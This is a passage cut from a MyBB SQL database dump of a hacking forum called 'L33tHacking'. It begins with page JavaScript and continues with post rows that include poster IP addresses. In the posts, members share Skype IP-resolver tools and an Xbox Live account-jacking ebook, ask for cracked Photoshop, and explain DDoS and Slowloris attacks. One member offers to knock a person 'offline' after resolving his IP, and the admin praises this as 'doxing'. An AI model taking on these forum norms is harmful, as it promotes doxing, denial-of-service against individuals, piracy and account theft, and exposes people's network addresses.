(typeof(self.pageYOffset)==\"number\") {\nsdown=self.pageYOffset;\nsleft=self.pageXOffset;\n}\nelse if (document.body.scrollTop || document.body.scrollLeft) {\nsdown=document.body.scrollTop;\nsleft=document.body.scrollLeft;\n}\nelse if (document.documentElement && (document.documentElement.scrollTop || document.documentElement.scrollLeft)) {\nsleft=document.documentElement.scrollLeft;\nsdown=document.documentElement.scrollTop;\n}\nelse {\nsdown=0;\nsleft=0;\n}\n}\nwindow.onresize=set_width;\nfunction set_width() {\nif (typeof(self.innerWidth)==\"number\") {\nswide=self.innerWidth;\nshigh=self.innerHeight;\n}\nelse if (document.documentElement && document.documentElement.clientWidth) {\nswide=document.documentElement.clientWidth;\nshigh=document.documentElement.clientHeight;\n}\nelse if (document.body.clientWidth) {\nswide=document.body.clientWidth;\nshigh=document.body.clientHeight;\n}\n}\nfunction createDiv(height, width) {\nvar div=document.createElement(\"div\");\nrainbow=\"#\"+hex[r]+hex[g]+hex[b]\nif (seq==6){\nb--\nif (b==0)\nseq=1\n}\nif (seq==5){\nr++\nif (r==12)\nseq=6\n}\nif (seq==4){\ng--\nif (g==0)\nseq=5\n}\nif (seq==3){\nb++\nif (b==12)\nseq=4\n}\nif (seq==2){\nr--\nif (r==0)\nseq=3\n}\nif (seq==1){\ng++\nif (g==12)\nseq=2\n}\ndiv.style.position=\"absolute\";\ndiv.style.height=height+\"px\";\ndiv.style.width=width+\"px\";\ndiv.style.overflow=\"hidden\";\ndiv.style.zIndex=\"10\";\ndiv.style.backgroundColor=rainbow;\nreturn (div);\n}\nwindow.onload=function()\n{\ninitCursor()\ninitImage()\nstartTime()\n}\nfunction initImage() {\nimageId = \'menu\'\nimage = document.getElementById(imageId);\nsetOpacity(image, 0);\nimage.style.visibility = \"visible\";\nfadeIn(imageId,0);\n}\nfunction fadeIn(objId,opacity) {\nif (document.getElementById) {\nobj = document.getElementById(objId);\nif (opacity <= 100) {\nsetOpacity(obj, opacity);\nopacity += 10;\nwindow.setTimeout(\"fadeIn(\'\"+objId+\"\',\"+opacity+\")\", 120);\n}\n}\n}\nfunction setOpacity(obj, opacity) {\nopacity = (opacity == 100)?99.999:opacity;\n// IE/Win\nobj.style.filter = \"alpha(opacity:\"+opacity+\")\";\n// Safari<1.2, Konqueror\nobj.style.KHTMLOpacity = opacity/100;\n// Older Mozilla and Firefox\nobj.style.MozOpacity = opacity/100;\n// Safari 1.2, newer Firefox and Mozilla, CSS3\nobj.style.opacity = opacity/100;\n}\nfunction changeNav(id) {\ndocument.getElementById(\'content\').innerHTML=document.getElementById(id).innerHTML;\ndocument.getElementById(\'main\').innerHTML=document.getElementById(\'home\').innerHTML;\ndocument.getElementById(\'rabbit\').style.top=\"275px\"\ndocument.getElementById(\'penguin\').style.top=\"532px\"\n}\nfunction hidestatus(){\nwindow.status=\"\"\nreturn true\n}\n// ]]>\n</script>\n<script type=\"text/javascript\">\nif (window.jstiming) window.jstiming.load.tick(\'headEnd\');\n</script>\n<div class=\'navbar section\' id=\'navbar\'><div class=\'widget navbar\' id=\'navbar1\'><script type=\"text/javascript\">\nfunction setAttributeOnload(object, attribute, val) {\nif(window.addEventListener) {\nwindow.addEventListener(\"load\",\nfunction(){ object[attribute] = val; }, false);\n} else {\nwindow.attachEvent(\'onload\', function(){ object[attribute] = val; });\n}\n}\nfunction showRelatedContent(args) {\nvar el = document.getElementById(\'related-iframe\');\nif (el.parentNode.style.display != \'none\') {\nel.parentNode.style.display = \'none\';\ndocument.onclick = showRelatedContent.prevOnClick;\nreturn;\n}\nvar match = /(?:^[?]|&)c=([0-9]+)(?:&|(?!.))/.exec(args);\nif (match !== null) {\ndocument.getElementById(\'related-loading\').style.left = match[1] + \'px\';\nel.style.left = Math.max(0, match[1] - parseInt(el.width) / 2) + \'px\';\n}\nel.src = \"http://www.blogger.com\"\n+ \'/related-content.g?q=\'\n+ window.location.href\n+ \'&id=\' + \"7792698363959436653\";\nel.parentNode.style.display = \'block\';\nshowRelatedContent.prevOnClick = document.onclick;\n// Hide related-content dropdown when clicking anywhere but on it.\ndocument.onclick = function() {\nvar el = document.getElementById(\'related-iframe\');\nif (el.parentNode.style.display != \'none\') {\nel.parentNode.style.display = \'none\';\n}\ndocument.onclick = showRelatedContent.prevOnClick;\n};\n}\n</script>\n\n\n<SCRIPT TYPE=\"text/javascript\"> \n<!-- \n//Disable right click script \n//visit http://www.rainbow.arch.scriptmania.com/scripts/ \nvar message=\"U MAD BRO?\"; \n/////////////////////////////////// \nfunction clickIE() {if (document.all) {(message);return false;}} \nfunction clickNS(e) {if \n(document.layers||(document.getElementById&&!document.all)) { \nif (e.which==2||e.which==3) {(message);return false;}}} \nif (document.layers) \n{document.captureEvents(Event.MOUSEDOWN);document.onmousedown=clickNS;} \nelse{document.onmouseup=clickNS;document.oncontextmenu=clickIE;} \ndocument.oncontextmenu=new Function(\"return false\") \n// --> \n</SCRIPT> \n\n\n\n\n</p>\n</body>\n</font>\n</html>\n\n[/code]\n\nEnjoy it :)\nThanks to Mr407', '72.231.24.165', '1223104677', '0', '0', '1', '1351917694', '1', '807e1605f67b316cbbae76a15f43a2fb', '0', '1351917694'); INSERT INTO mybb_posts VALUES('6953', '1170', '6839', '63', 'RE: Need a sig', '0', '4', 'Triple H', '1351917913', 'I want my name and l33thacking', '173.245.64.81', '-1376436143', '1', '0', '0', '0', '1', '885e80561a05bb04004771be73451267', '0', '0'); INSERT INTO mybb_posts VALUES('6954', '1171', '6840', '33', 'RE: Anyone have photoshop cracked?', '0', '4', 'Triple H', '1351917954', 'i will take cs4 or cs3. Can i get a non survey link plz?', '173.245.64.81', '-1376436143', '1', '0', '0', '0', '1', '75a1fff3501a54a8062b2320cb843a13', '0', '0'); INSERT INTO mybb_posts VALUES('2539', '509', '0', '21', 'The world of DDoS Attacks', '0', '8', 'spacefish36', '1348516722', '[align=center]Welcome to the world of DDoS attacks, I am sure you have seen these, herd of these, experienced these ect. Now I am going to take you into how they work.\r\n\r\nFirst thing we are going to talk about is the \"4 layer DDoS attack\" which is the most common type of DDoS attack which is when many attackers hit a target at the same time. This is usually done with easy access tools such as the \"Low Orbit Ion Cannon\" or \"Command Prompt\"\r\nthis is just basically sending thousands of packets per second to a target, and flooding the server until it goes down.\r\nThis is a very weak kind of attack if using it by yourself, but with 100\'s or thousands of people all doing it at the same time it is very effective.\r\n\r\n\r\nNext type of attack I will be discussing is the \"Layer 7 DDoS Attack\" this is more advanced, how this works is instead of just constantly sending packets to the server you send it an HTTP get request but if you just send part of it and not the other half, so the server is expecting the other half wich ties up most of the server this is also called the \"Slowloris\" attack, with this you can freeze a server up very quickly, the most famous person who uses these attacks is th3j35t3r who is said to be able to hold off sites with a 3g cellphone.\r\n\r\n\r\n\r\nI will post more later cause I am tired of typing lol so yea, I will probably update this later\r\n\r\n\r\nList of information on DDoS attacks:\r\nhttp://www.youtube.com/watch?v=1EAnjZqXK9E\r\nhttp://infosecisland.com/blogview/10394-...ained.html\r\nhttp://www.prolexic.com/gad-north-americ...7QodgggAlQ\r\nhttp://antivirus.about.com/od/whatisavir...ttacks.htm\r\nhttp://www.youtube.com/watch?v=3bDX7uXm0V0[/align]', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'b64ca7c13de4fb79ebea3918bcf8f07b', '0', '0'); INSERT INTO mybb_posts VALUES('2540', '510', '0', '19', '[Junk]Rbd\'s Skype Resolver Source', '0', '8', 'spacefish36', '1348517164', '[align=center]I thought I\'d share this source with you but this does not come with the api, you have to use your own API. I cannot really afford to share it :s\r\n\r\n[url=http://bronyboard.net/skyperd/RBD%27s%20Skype%20Resolver%20%5BPublic%5D.zip]Download Here[/url]\r\n\r\n\r\nEnjoy the source it was coded by Hardcore smasher [/align]', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '1b9a116099a386768531a25f2e0f73cf', '0', '0'); INSERT INTO mybb_posts VALUES('2541', '503', '2465', '3', 'RE: Ridiculous Downtime and Awards', '0', '82', 'iTzIpod', '1348518043', 'Lol t3h jok3r. Well I\'m pretty sure you know I\'m a post whore, a rep whore, and an awards whore.\n\n\nOr you should\'ve known...\n\nI wish the Awards Plugin could be back on now.. :/ But I don\'t wanna rush it since like I want something that is working and took time to make instead of something that was rushed and all. :p\n\n\nOT: Awards Plugin is a huge impact (good) on the forum :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1601a460a84bb809165bde34715e3db3', '0', '0'); INSERT INTO mybb_posts VALUES('2542', '190', '665', '56', 'RE: Copy and paste game', '0', '82', 'iTzIpod', '1348518083', 'Awards Plugin\n\n\n\nCopied for a post.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e9968aa1837b232c99e48126c0af148a', '0', '0'); INSERT INTO mybb_posts VALUES('2543', '510', '2540', '19', 'RE: Rbd\'s Skype Resolver Source', '0', '82', 'iTzIpod', '1348520446', 'Can you add a Virus Scan?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '99db00833465bd2ea8c51e885bafef6f', '0', '0'); INSERT INTO mybb_posts VALUES('2544', '511', '0', '5', 'New forums suggestions', '0', '1', 't3h jok3r', '1348523222', 'I\'m planning on adding some more coding and computing sections. What sections do you think should be added.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '8e2cbb7504ea0e79f40323c75b8414f3', '0', '0'); INSERT INTO mybb_posts VALUES('2545', '512', '0', '30', 'Roadkil.Net´s Tool Collection', '0', '5', 'Timmy', '1348523647', 'I found this site already like a year ago and were impressed by it and the owner uploaded more and more tools and today i want to share the site with those who don\'t know it....\r\n\r\n[align=center][img]http://www.roadkil.net/images/logo.png[/img]\r\n[/align]\r\n\r\nThis site contains alot of really nice and HQ Tools, below i will create short list with links to these tools. All rights belongs to the site owner of roadkil.net, the thread gets instantly deleted if he wants so. \r\n\r\n[align=center][b]Roadkil\'s Disk Wipe[/b][/align]\r\n\r\n\r\nSecurely erases the contents of a disk replacing it with random data or leaving the drive completely blank. Numerous passes can be performed to ensure data is totally unrecoverable. Program works on hard and floppy disks aswell as USB/Flash drives.\r\n\r\nDownload: http://www.roadkil.net/program.php/P14/Disk%20Wipe\r\n\r\n\r\n[align=center][b]Roadkil\'s Boot Builder[/b][/align]\r\n\r\n\r\nBoot builder allows you to create your own custom boot sector from scratch. This utility allows you to recreate or restore boot sectors lost due to virus or other damage to a drive. Boot sectors can be imported/exported to a disk or created from a template. This program supports FAT and NTFS boot sector types.\r\n\r\nDownload: http://www.roadkil.net/program.php/P3/Boot%20Builder\r\n\r\n\r\n[align=center][b]Roadkil\'s Undelete[/b][/align]\r\n\r\n\r\nAllows you to undelete files that you have accidentally deleted from your drives.\r\n\r\nDownload: http://www.roadkil.net/program.php/P28/Undelete\r\n\r\n\r\n[align=center][b]Roadkil\'s Window Message[/b][/align]\r\n\r\n\r\nDisplays information about the window the mouse pointer is currently over. Displays the windows handle, size and the owner thread information. Useful for people writting windows applications or wanting to create an interface to another application such as macros/scripts.\r\n\r\nDownload: http://www.roadkil.net/program.php/P30/Window%20Message\r\n\r\n\r\n[align=center][b]Roadkil\'s Audit[/b][/align]\r\n\r\n\r\nCreates a database of computers on your network and their configurations. Allows you to track what applications are installed across your network for license auditing purposes. A great help for large networks trying to ensure they are legitimate. Audit also provides a great way of determining which computers in your network require hardware upgrades or software installations. \r\n\r\nDownload: http://www.roadkil.net/program.php/P2/Audit\r\n\r\n\r\n[align=center][b]Roadkil\'s Error List[/b][/align]\r\n\r\n\r\nDisplays information relating to a windows error code. Allows you to determine what the error message given by an application actually means. The programming definition of the error is also given so coders can create a handler for them in their application. \r\n\r\nDownload: http://www.roadkil.net/program.php/P15/Error%20List\r\n\r\n\r\n[align=center][b]Roadkil\'s Monitor Test[/b][/align]\r\n\r\n\r\nDisplays test patterns for use when performing monitor repairs. Displays pure colours and white screens for colour tuning or finding missing colours, grid lines for focusing and setting the image dimensions correctly. A must for any monitor repair person or checking the quality of a monitors display. \r\n\r\nDownload: http://www.roadkil.net/program.php/P20/Monitor%20Test\r\n\r\n\r\n\r\n\r\nsource: http://www.roadkil.net/\r\n\r\nA big thanks to the hoster, please support him.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '24fe4ffacfe54db702fa7d501e7fcc40', '0', '0'); INSERT INTO mybb_posts VALUES('2546', '513', '0', '3', 'The 500 threads celebration thread :)', '0', '5', 'Timmy', '1348523800', 'Congratulations L33THacking, you guys reached 500 threads.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '69a2fe5ebc8fbda72406ed1efd703b46', '0', '0'); INSERT INTO mybb_posts VALUES('2547', '190', '665', '56', 'RE: Copy and paste game', '0', '1', 't3h jok3r', '1348528443', 'I am not Cinderella, but once upon a time I thought I was. When I was two years old I was brought to America by my father from the Fiji Islands after the death of my mother. I came here to live a new life, although I was only two and was not accustomed to anything else anyway. So this would be the only life I would no. I was not given two evil stepsisters, just a spoiled little stepbrother and a snobby older stepsister. I looked up to them, I don’t exactly know why, and since I didn’t know any better I became the doormat of the family. They did whatever they wanted, whenever they wanted and I just kept to myself and spent most of my time reading Goosebumps. As the years went by I became a big fan sports fan and always wished I could watch TV to watch a game sometime, since I was always told to stay away from Tvs, videogames, and computers. Since I had nothing else to do, I stayed in my room and listened to the games on the radio and at night the books kept my company. As I grew older, I became very good at reading and so I became a good student, much to the jealousy of my siblings and stepmother. My dad told me to be humble and so I did, but the family could not help but notice, as they themselves were in reality, headed nowhere. They just couldn’t handle it when I brought home the report cards to show my dad, and one day I even had the audacity to boldly go where I had never gone before. I came home, very quietly, took out a honor roll bumper sticker from my backpack, and slapped it on the bumper of the family car like I owned it. Of course, there would be dire consequences for my criminal behavior. I didn’t know what to expect and so I stayed in my room. Big mistake. One day I looked up at the ceiling and saw that she had closed the AC vent in my room! I was like 4 ft tall so I couldn’t reach it. Boy did I regret my insolent then. I guess I needed to learn my lesson.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '2af921b55efddf7b0268c49033952f38', '0', '0'); INSERT INTO mybb_posts VALUES('2548', '513', '2546', '3', 'RE: The 500 threads celebration thread :)', '0', '82', 'iTzIpod', '1348529875', 'Congratulations L33tHacking. Although I usually post the Milestone threads in the Off Topic Section/Lounge.. :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7904a2467679e1609fdc1018b7d55a58', '0', '0'); INSERT INTO mybb_posts VALUES('2549', '190', '665', '56', 'RE: Copy and paste game', '0', '82', 'iTzIpod', '1348529957', 'http://www.deznation.ca/rsps/\n\nNot Advertising. I just copied it from a Skype Log..\n\nIt\'s a RSPS that my friend coded.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7321ee4e9964c978c14c3d004c9d0831', '0', '0'); INSERT INTO mybb_posts VALUES('2550', '511', '2544', '5', 'RE: New forums suggestions', '0', '82', 'iTzIpod', '1348530063', 'Not related to coding or computing.\nBut\n\n\nGamers Section (I know you\'re gonna add it. :p)\nMovies Section? (Maybe)\nInnuendo (LOL :P)\nI don\'t know? \n\nMight suggest more in the future when I\'m in a good mood.\n[hr]\n- Rename Monetizing Techniques to Monetizing\n- Add a sub forum in Monetizing called Referral Links (All referral links can go there) (Registering for forums. No rival sites of course. & Adf.ly/PPC Link threads can go there. Like if someone is clicking on all of your PPC links. You can post them there.', '24.212.197.164', '416597412', '1', '0', '82', '1348531558', '1', '4c548ea148778ccc07d88e2ef52b89c6', '0', '0'); INSERT INTO mybb_posts VALUES('2551', '514', '0', '9', 'How to make serious money', '0', '82', 'iTzIpod', '1348531264', '[align=center][b] This eBook shows you how to make a couple $$/Day just by following this simple guide.\nThis could easily make you $200/day if you do well.\n\nTo View: [url=http://adf.ly/D9BfZ] Click[/url]\n\n\n\n\n\n\nTo Download: [url=http://adf.ly/D9Bhl] Click[/url][/b][/align]', '24.212.197.164', '416597412', '1', '0', '82', '1348531297', '1', '1d8dd70529a5bd0e04e9f90a1a0f8103', '0', '1348531297'); INSERT INTO mybb_posts VALUES('2552', '515', '0', '3', '[Announcement] MyBBTopSites/ForumTopSites Vote For L33tHacking', '0', '82', 'iTzIpod', '1348531835', 'Everyone please visit the link in t3h jok3r\'s signature. \r\nPlease take a minute to vote for L33t Hacking. This is a huge contribution for us if you do so. As it can \"advertise\" some members. \r\n\r\nOr, use the link here: [url=http://forumtopsites.net/index.php?a=in&u=joker] Click To Vote For L33tHacking[/url]', '24.212.197.164', '416597412', '1', '0', '82', '1348958305', '1', '25ce001858aced4fc6d77e8b7afd5dc8', '0', '1348958305'); INSERT INTO mybb_posts VALUES('2553', '515', '2552', '3', 'RE: [Announcement] MyBBTopSites Vote For L33tHacking', '0', '1', 't3h jok3r', '1348532158', 'Stickied. Also, click on the green one.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '2989713b629b64f8f8be187ecab5bfe8', '0', '0'); INSERT INTO mybb_posts VALUES('2554', '513', '2548', '3', 'RE: The 500 threads celebration thread :)', '0', '1', 't3h jok3r', '1348532218', '[quote=\'iTzIpod\' pid=\'2548\' dateline=\'1348529875\']\r\nCongratulations L33tHacking. Although I usually post the Milestone threads in the Off Topic Section/Lounge.. :p\r\n[/quote]\r\nSmall milestones are OK in the Lounge/Off topic but huge site milestones can be posted here.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '806d0e440a01f828916309729576b9fa', '0', '0'); INSERT INTO mybb_posts VALUES('2555', '514', '2551', '9', 'RE: How to make serious money', '0', '1', 't3h jok3r', '1348532529', 'I\'m going to use this. Thanks for sharing, the best method out on LH.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '7aca1ff1007cc2b7a4e1efa0da6ab803', '0', '0'); INSERT INTO mybb_posts VALUES('2556', '511', '2544', '5', 'RE: New forums suggestions', '0', '1', 't3h jok3r', '1348532785', 'I thought about the movies section. Here is my plan on the movies section.\n\nNormal Members: Discuss Movies\nUpgraded Members: Movie RIPs\n\nGamers will be added when NXK sends me the gamers group infomation.\n\nI will think of monetizing in a week or two, but not now.', '173.245.64.107', '-1376436117', '1', '0', '0', '0', '1', '4ed4d7f394291da02863881362de40d9', '0', '0'); INSERT INTO mybb_posts VALUES('2557', '516', '0', '29', 'RBD\'s Xbox live Jacking Method', '0', '1', 't3h jok3r', '1348533080', 'Original Post:\r\n\r\n[IMG]http://i.imgur.com/3dJNe.png[/IMG]\r\n\r\n[img]http://puu.sh/147Pf[/img]\r\n[img]http://puu.sh/147PC[/img]\r\n\r\n\r\nI know this has been leaked but it was my ebook before some idiot leaked it so here it is, I may aswell give it away.\r\n\r\nhttp://hidemyass.com/files/eZtd3/', '173.245.64.107', '-1376436117', '1', '0', '1', '1348542423', '1', 'bfe4a2303cc843a5738d9df26bec99bb', '0', '1348542423'); INSERT INTO mybb_posts VALUES('2572', '516', '2560', '29', 'RE: RBD\'s Xbox live Jacking Method', '0', '1', 't3h jok3r', '1348542449', '[quote=\'iTzIpod\' pid=\'2560\' dateline=\'1348538030\']\r\n... You put in vouches from different forums. Wasn\'t that forbidden or something? :o\r\n[/quote]\r\n\r\nMy bad. It was leak from someone who likes leaking our content.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '1ecee4ebac700cda31b7d7de2859a493', '0', '0'); INSERT INTO mybb_posts VALUES('2573', '518', '2571', '7', 'RE: 2,500 Total Forum Posts', '0', '82', 'iTzIpod', '1348542790', '[quote=\'t3h jok3r\' pid=\'2571\' dateline=\'1348542336\']\r\nCongratz LH, thanks for contributing and to everyone who participated. I also appreciate the spammers that came here and spammed threads and their posts which helped us with more activity :D\r\n[/quote]\r\n\r\nGee... I wonder who did that? Also, lets try to go for more members!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '368f80ad3b4619c32cbb2b0bcea47c31', '0', '0'); INSERT INTO mybb_posts VALUES('2574', '518', '2565', '7', 'RE: 2,500 Total Forum Posts', '0', '1', 't3h jok3r', '1348542990', 'True. I\'m trying my best now, I didn\'t advertise for 2 weeks. I lost a lot yesterday and lost a lot of data ever since my PC got fucked.\n\nI emptied my PP yesterday and will use the new monetizing ebook you released.\n\n[b]Edited[/b]\n\nOff Topic (AKA Lounge) reached 400 posts. Today LH has started to settle, Congratz LH.', '72.231.24.165', '1223104677', '1', '0', '1', '1348543042', '1', '6d4a89c9f708fcba61aeaed5d3db385a', '0', '1348543042'); INSERT INTO mybb_posts VALUES('2558', '515', '2552', '3', 'RE: [Announcement] MyBBTopSites Vote For L33tHacking', '0', '82', 'iTzIpod', '1348537925', 'By green one, you mean the green button that says Enter and Vote?\n\n\nAlso, remember to vote every 24 hours! :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3f5457d0946c2119dd726fe10c08ae67', '0', '0'); INSERT INTO mybb_posts VALUES('2559', '513', '2546', '3', 'RE: The 500 threads celebration thread :)', '0', '82', 'iTzIpod', '1348537959', 'Are you adding a Milestones Subforum? Just so we can post everything in there? :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '6facbfa3828233d7cebfd199ef6af8e1', '0', '0'); INSERT INTO mybb_posts VALUES('2560', '516', '2557', '29', 'RE: RBD\'s Xbox live Jacking Method', '0', '82', 'iTzIpod', '1348538030', '... You put in vouches from different forums. Wasn\'t that forbidden or something? :o', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4bd5d4ceea44086581b1a8f1efc7982b', '0', '0'); INSERT INTO mybb_posts VALUES('2561', '514', '2551', '9', 'RE: How to make serious money', '0', '82', 'iTzIpod', '1348538072', 'You\'re welcome. Just trying to contribute to L33t Hacking.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'cf5482eb0020f48ba2fada3bce628d2f', '0', '0'); INSERT INTO mybb_posts VALUES('2562', '493', '2405', '35', 'RE: My Ugly Gamer Userbars', '0', '82', 'iTzIpod', '1348538300', 'Hopefully it can come out sooner or later. :D\nAnyways, on topic, I might be making a new Gamer Userbar soon. Can you give me any ideas on what to use as a \"render/icon\"?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd26873f5312d8e435565d7258f3734a2', '0', '0'); INSERT INTO mybb_posts VALUES('2563', '439', '2051', '58', 'RE: Unique - Recruitment', '0', '82', 'iTzIpod', '1348538400', 'Update, we are still recruiting. I suggest you try out since who knows? I might like your application and you can win access to HQ and Unique Exclusive stuff. Such as Leaks, Programs, Cracks, Methods, eBooks, and many more.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b75980994307b4a439208c214e4d0512', '0', '0'); INSERT INTO mybb_posts VALUES('2564', '517', '0', '34', 'Spiderman Signature Tutorial', '0', '82', 'iTzIpod', '1348538865', '[img]http://fc02.deviantart.net/fs16/f/2007/172/3/2/Spiderman_Signature_Tutorial_by_raime910.jpg[/img]\r\n\r\nCredits: RAIME\r\n\r\nMight try this out next time.\r\n\r\nPost results below. Enjoy\r\nGood luck.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '38c195bd85759d1ddbd9e7285ebf38a1', '0', '0'); INSERT INTO mybb_posts VALUES('2565', '518', '0', '7', '2,500 Total Forum Posts', '0', '82', 'iTzIpod', '1348538956', 'Congratulations L33tHacking on a total of 2,500 posts.\r\n(This is a Milestone Thread)\r\nI would personally like to thank everyone that contributed.\r\n\r\n\r\n- iTzIpod', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'bffb07f66d04971ade305a3e294fb0a3', '0', '0'); INSERT INTO mybb_posts VALUES('2566', '519', '0', '15', 'NXKs Skype resolver [Free/DirectDownload/No surveys]', '0', '61', 'NXK', '1348539056', 'Since everyone else is making them I thought Id make one, This probably wont last long. So get it while you can! it\'s working! Least you can do is say thank you.. That would be nice.\r\n\r\n[img]http://i.imgur.com/THfjS.png[/img]\r\n\r\nDownload\r\nhttp://adf.ly/D9KVa\r\n\r\nHave fun :)\r\nIf you want the api pm me.\r\n\r\nvirus scan (you can decompile it and take the api.. I know it\'s going to happen anyways) I would virus total scan it but it would take forever since i\'m like 900th in que\r\n\r\nhttp://virusscan.jotti.org/en/scanresult/ec001e66c8b973327aa51f7f7ea1685fc429ba6f\r\n\r\n\r\n\r\n\r\n\r\n\r\nCredits to aeonhack and the theme maker', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '1a461b354da48ffbf71b5dc8651d0278', '0', '0'); INSERT INTO mybb_posts VALUES('2567', '519', '2566', '15', 'RE: NXKs Skype resolver [Free/DirectDownload/No surveys]', '0', '82', 'iTzIpod', '1348540550', '[quote=\'NXK\' pid=\'2566\' dateline=\'1348539056\']\r\nSince everyone else is making them I thought Id make one, This probably wont last long. So get it while you can! it\'s working! Least you can do is say thank you.. That would be nice.\r\n\r\n[img]http://i.imgur.com/THfjS.png[/img]\r\n\r\nDownload\r\nhttp://adf.ly/D9KVa\r\n\r\nHave fun :)\r\nIf you want the api pm me.\r\n\r\nvirus scan (you can decompile it and take the api.. I know it\'s going to happen anyways) I would virus total scan it but it would take forever since i\'m like 900th in que\r\n\r\nhttp://virusscan.jotti.org/en/scanresult/ec001e66c8b973327aa51f7f7ea1685fc429ba6f\r\n\r\n\r\n\r\n\r\n\r\n\r\nCredits to aeonhack and the theme maker\r\n[/quote]\r\n\r\nSigh... I\'m on mobile right now. So I can\'t download it. Hopefully it is still working tomorrow so I can use it to find t3h jok3r\'s IP and boot him offline. Joking. Some faggot recently scammed me $41 so I wanna give him his IP and scare him enough to learn his lesson. Because of this, I wanna learn to code... (Yes I don\'t know how..) Sad :(. Also, if you made this exclusively for L33tHacking, it would be nice to put a watermark on it. Or anything like L33thacking.net is simple and good enough. Just a suggestion. And don\'t worry. Tomorrow, I\'ll download this and scan it myself with VirusTotal for you.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'accee6a873aa13d3ac2a78bb8409bcd9', '0', '0'); INSERT INTO mybb_posts VALUES('2568', '519', '2567', '15', 'RE: NXKs Skype resolver [Free/DirectDownload/No surveys]', '0', '61', 'NXK', '1348540721', '[quote=\'iTzIpod\' pid=\'2567\' dateline=\'1348540550\']\r\n[quote=\'NXK\' pid=\'2566\' dateline=\'1348539056\']\r\nSince everyone else is making them I thought Id make one, This probably wont last long. So get it while you can! it\'s working! Least you can do is say thank you.. That would be nice.\r\n\r\n[img]http://i.imgur.com/THfjS.png[/img]\r\n\r\nDownload\r\nhttp://adf.ly/D9KVa\r\n\r\nHave fun :)\r\nIf you want the api pm me.\r\n\r\nvirus scan (you can decompile it and take the api.. I know it\'s going to happen anyways) I would virus total scan it but it would take forever since i\'m like 900th in que\r\n\r\nhttp://virusscan.jotti.org/en/scanresult/ec001e66c8b973327aa51f7f7ea1685fc429ba6f\r\n\r\n\r\n\r\n\r\n\r\n\r\nCredits to aeonhack and the theme maker\r\n[/quote]\r\n\r\nSigh... I\'m on mobile right now. So I can\'t download it. Hopefully it is still working tomorrow so I can use it to find t3h jok3r\'s IP and boot him offline. Joking. Some faggot recently scammed me $41 so I wanna give him his IP and scare him enough to learn his lesson. Because of this, I wanna learn to code... (Yes I don\'t know how..) Sad :(. Also, if you made this exclusively for L33tHacking, it would be nice to put a watermark on it. Or anything like L33thacking.net is simple and good enough. Just a suggestion. And don\'t worry. Tomorrow, I\'ll download this and scan it myself with VirusTotal for you.\r\n[/quote]\r\n\r\nIf you need him taken care of, cough cough offline. Let me know.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '1f5c79a0e0a29b93b712251e66b42768', '0', '0'); INSERT INTO mybb_posts VALUES('2569', '519', '2568', '15', 'RE: NXKs Skype resolver [Free/DirectDownload/No surveys]', '0', '82', 'iTzIpod', '1348541749', '[quote=\'NXK\' pid=\'2568\' dateline=\'1348540721\']\r\n[quote=\'iTzIpod\' pid=\'2567\' dateline=\'1348540550\']\r\n[quote=\'NXK\' pid=\'2566\' dateline=\'1348539056\']\r\nSince everyone else is making them I thought Id make one, This probably wont last long. So get it while you can! it\'s working! Least you can do is say thank you.. That would be nice.\r\n\r\n[img]http://i.imgur.com/THfjS.png[/img]\r\n\r\nDownload\r\nhttp://adf.ly/D9KVa\r\n\r\nHave fun :)\r\nIf you want the api pm me.\r\n\r\nvirus scan (you can decompile it and take the api.. I know it\'s going to happen anyways) I would virus total scan it but it would take forever since i\'m like 900th in que\r\n\r\nhttp://virusscan.jotti.org/en/scanresult/ec001e66c8b973327aa51f7f7ea1685fc429ba6f\r\n\r\n\r\n\r\n\r\n\r\n\r\nCredits to aeonhack and the theme maker\r\n[/quote]\r\n\r\nSigh... I\'m on mobile right now. So I can\'t download it. Hopefully it is still working tomorrow so I can use it to find t3h jok3r\'s IP and boot him offline. Joking. Some faggot recently scammed me $41 so I wanna give him his IP and scare him enough to learn his lesson. Because of this, I wanna learn to code... (Yes I don\'t know how..) Sad :(. Also, if you made this exclusively for L33tHacking, it would be nice to put a watermark on it. Or anything like L33thacking.net is simple and good enough. Just a suggestion. And don\'t worry. Tomorrow, I\'ll download this and scan it myself with VirusTotal for you.\r\n[/quote]\r\n\r\nIf you need him taken care of, cough cough offline. Let me know.\r\n[/quote]\r\n\r\nI don\'t know his IP or anything. But I got his Skype ID. Hopefully your resolver gets the right IP. I don\'t have Skype available at this moment so I don\'t know his Skype. We\'ll find out tomorrow.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4300fea3fc9b3bf61372b7c237bcb8ff', '0', '0'); INSERT INTO mybb_posts VALUES('2570', '519', '2566', '15', 'RE: NXKs Skype resolver [Free/DirectDownload/No surveys]', '0', '1', 't3h jok3r', '1348542283', 'You got a bad ass doxer here ;)\n\nSend me the IP too if you find it. I also like Ipods idea and I will test this tomorrow.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '47016a371c79aba39045b3f6da7ce91d', '0', '0'); INSERT INTO mybb_posts VALUES('2571', '518', '2565', '7', 'RE: 2,500 Total Forum Posts', '0', 